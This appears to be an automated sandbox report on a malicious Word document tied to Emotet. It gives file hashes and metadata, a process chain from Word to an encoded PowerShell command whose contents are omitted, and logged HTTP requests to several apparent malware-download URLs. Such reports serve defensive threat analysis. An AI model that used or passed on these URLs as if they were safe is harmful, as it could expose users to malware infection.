File name: | 9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1 |
Full analysis: | https://app.any.run/tasks/56df1396-00c5-4a93-be81-55b7d775f2d8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | October 14, 2019, 13:21:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Virginia, Subject: Trafficway, Author: Virgil Weissnat, Keywords: compressing, Comments: Agent, Template: Normal.dotm, Last Saved By: Shemar Abbott, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 13:46:00 2019, Last Saved Time/Date: Fri Oct 11 13:46:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0 |
MD5: | 8284E996AEA8E5075256C03A93EAA6DF |
SHA1: | 296A881BDDE6650D439F607293DA8C63C1AD43E0 |
SHA256: | 9E1D7CD63B0EDCB4B3C4B1C86ECF477245BA82B4291BF26484FE2DD6CD9D12A1 |
SSDEEP: | 6144:qOlRhyHkMKUzSdnLx3wD6RjKBiXCoCD2O/PRi:qOlRhyHk1UGdt3EqCi |
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
Manager: | Heidenreich |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 203 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Macejkovic - Treutel |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 174 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:11 12:46:00 |
CreateDate: | 2019:10:11 12:46:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Shemar Abbott |
Template: | Normal.dotm |
Comments: | Agent |
Keywords: | compressing |
Author: | Virgil Weissnat |
Subject: | Trafficway |
Title: | Virginia |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1516 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3932 | powershell -enco [base64-encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4D6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RWNJC2UOOBPA9I4F9493.temp | — | |
MD5:— | SHA256:— | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:232C95F063EB4B4E96674E371F41D5EE | SHA256:D69FBD77D194718F34082C2306AE0C1F665EDA316C00F60D65080D96367E6BF3 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\266E8366.wmf | wmf | |
MD5:E7352603A8133672D2040C2CB941309D | SHA256:79FD74EC0B4754D832BBA89D4B9F7CFF2CB43CD705E754FE64E6F43F8D1AF0B6 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4FA4412.wmf | wmf | |
MD5:6D29753A945A3630809F8CCF84EAD963 | SHA256:C836D2354E1BD1BDF4692102BC8C9EB73591E114DD4FD7ADD74F71E5CB30D9D1 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE96CC64.wmf | wmf | |
MD5:D80CD6BF1857923CEB75FBD80FDA8608 | SHA256:EE6441D5FC0BDE7A2E2D1C656D5646337B021C3D3F15F392BDA3D6760C7BD0E8 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:674E699E357ECBC4E3BD6468C164D68E | SHA256:1857F8723EBCDBE439CC3EAF02BC0450A831B4B5165EBA754DE3C42FC64781D1 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A49997E.wmf | wmf | |
MD5:5C75BAC4670CF539507C916F1CB2E5E8 | SHA256:895518E13FCC0B517A9EB90A80E81F1E34C701A1252AB28C80EDE9C4C249DE84 | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE95D4B9.wmf | wmf | |
MD5:862AF9676C5222FAD75140D3F139D3A4 | SHA256:CA9A0B8F8D8DC8D4169B108076C8E62CFE7173AF6257E8C5E930505CE5F9A234 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3932 | powershell.exe | GET | 404 | 110.10.129.117:80 | http://firstmnd.com/wp/wp-content/3k960/ | KR | xml | 345 b | suspicious |
3932 | powershell.exe | GET | 404 | 51.91.176.30:80 | http://fattoriaiponti.com/wp-admin/o1wiEqPfN/ | GB | xml | 345 b | suspicious |
3932 | powershell.exe | GET | 404 | 162.144.93.20:80 | http://deredia.com/cgi-bin/cbas/ | US | xml | 345 b | suspicious |
3932 | powershell.exe | GET | 404 | 112.213.89.96:80 | http://citylandgovap.net/8dqs5fv/6J/ | VN | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3932 | powershell.exe | 110.10.129.117:80 | firstmnd.com | SK Broadband Co Ltd | KR | suspicious |
3932 | powershell.exe | 198.71.59.14:443 | thesilverant.com | 1&1 Internet SE | US | unknown |
3932 | powershell.exe | 162.144.93.20:80 | deredia.com | Unified Layer | US | suspicious |
3932 | powershell.exe | 112.213.89.96:80 | citylandgovap.net | SUPERDATA | VN | suspicious |
3932 | powershell.exe | 51.91.176.30:80 | fattoriaiponti.com | — | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
thesilverant.com | | unknown |
firstmnd.com | | suspicious |
citylandgovap.net | | suspicious |
deredia.com | | suspicious |
fattoriaiponti.com | | suspicious |